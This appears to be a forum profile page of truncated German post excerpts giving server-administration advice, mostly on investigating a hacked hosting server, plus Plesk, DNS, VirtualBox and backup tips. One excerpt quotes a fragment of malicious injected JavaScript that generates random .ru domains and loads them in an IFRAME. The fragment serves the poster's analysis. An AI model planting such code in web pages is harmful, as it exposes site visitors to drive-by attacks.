Da ich erst einmal davon ausgehe, dass die einzelnen Dienste nicht betroffen sind, schaue ich mir die Logfiles an.
Was sagen die access.log und ftp.log der einzelnen Kunden die Betroffen sind?
FTP Logs: (nur Beispiele)
access.log: (nur Beispiele)
Sollte ich hier kein Glück haben...
Was ich bis jetzt herausgefunden habe ist, dass diese "random" Domains in IFRAMES verpackt, vermehrt auftauchen.
IFRAME code:
var unix = Math.round(+new Date() / 1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME")...
Es scheint wohl eine Kombination aus zwei Angriffswellen zu sein.
Ich denke es wird in unseren Kreisen noch fleißig analysiert. Die ersten Auswirkungen sind schon zu sehen seit letzter Woche!
Hier ein interessanter Link zu dem Thema...
Wichtig bei Rkhunter ist, dass wenn man es im Nachhinein installiert, die Binary-Checks nicht aussagekräftig sind.
Diese könnten vom Hacker so verändert worden sein, dass zum Beispiel ein "netstat" die Verbindungen nicht mehr anzeigt.
Ich sehe in der "ps" Ausgabe nichts auffälliges.
Bitte einmal den Server auf Backscatter überprüfen, das war vor ein paar Monaten ein großes Problem bei Qmail.
Ansonsten mal die E-Mail Postfächer untersuchen, ob das Passwort erraten/ausgelesen worden ist und darüber gespammt wird.
Bitte schaue nach offenen Ports und Hintergrundprozessen. Normalerweise wird ein CMS gehackt und es werden Spam Skripte hinterlegt.
diese zwei Befehle sollten dir weiterhelfen:
ps fauxwww
netstat -tulpen
Ich empfehle dir den Server in den Rescue-Modus zu booten, um weiteren...
Hey Hushi,
was ist mit CUPS für die Druckerverwaltung, das beinhaltet doch auch ein schönes Webinterface? Denke dein Praktikant wird das auch Konfigurieren können.
Das hab ich zum Thema Samba und GUI gefunden...
So weit mir bekannt ist, kann man bei 1&1 den Reverse-Lookup unter dem Punkt "Server->IP-Adresse" im 1&1 Control-Center bearbeiten und dort eine Domain eintragen.
Damit sollte man den Reverse-Lookup setzen können.
(gilt nur für Root/Cloud-Server nicht für Managed-Server)
Bei...
Wichtig bei der Analyse ist auch deine CMS (Joomla,Wordpress,etc) zu untersuchen auf Hackerangriffe.
Im "Normalfall" wird das CMS erfolgreich angegriffen und ein schadhaftes Sendmail PHP Skript abgelegt. Über dieses Skript wird dann der Spam versendet.
Ohne weitere Logfiles ist das ganze...
Im Plesk (10) kann man kein eigenes Interface auswählen, welches dann der neuen IP Adresse zugeordnet wird. Man fügt die zusätzliche IP Adresse zum "Hauptinterface" meist "eth0" bzw. "venet0" hinzu.
Plesk legt im Hintergrund für jede neue IP Adresse ein neues Interface "eth0:x" respektive...
Danke für die Info PapaBaer.
@steff517
Vielleicht solltest du VirtualBox-Headless auf deinem Hostsystem installieren und die einzelnen Images mit PHPVirtualBox (bitte nur für Testsysteme verwenden) verwalten bis man produktiv gehen kann.
Empfehlen könnte ich dir, sofern dein System <=4GB ist folgendes Tool:
http://www.geekconnection.org/remastersys/
Es erstellt "live" ein Image von deinem System, ähnlich wie NortonGhost oder AcronisTrueImage (unter Windows).
Dieses Image kannst du dann in deine VirtualBox laden und mit...
Grundsätzlich vor einem Distributionsupdate:
Backup von systemrelevanten Einstellungen
Backup von Plesk Kunden Daten
verifizieren von Backups
Upgrade durchführen
Diese o.g. Schritte sollten eigentlich durch ein verwendetes Backup-System abgedeckt sein. Wenn nicht, dann bitte...
Ich würde empfehlen, die IP Adressen immer in den Plesk IP-Pool einzutragen und dann einem Kunden/Reseller zuordnen. Das manuelle einspielen von Interfaces und ggf. neuen IP Adressen in Zusammenhang mit Plesk, sollte man nur durchführen, wenn man wirklich weiss was man macht.
Ein paar...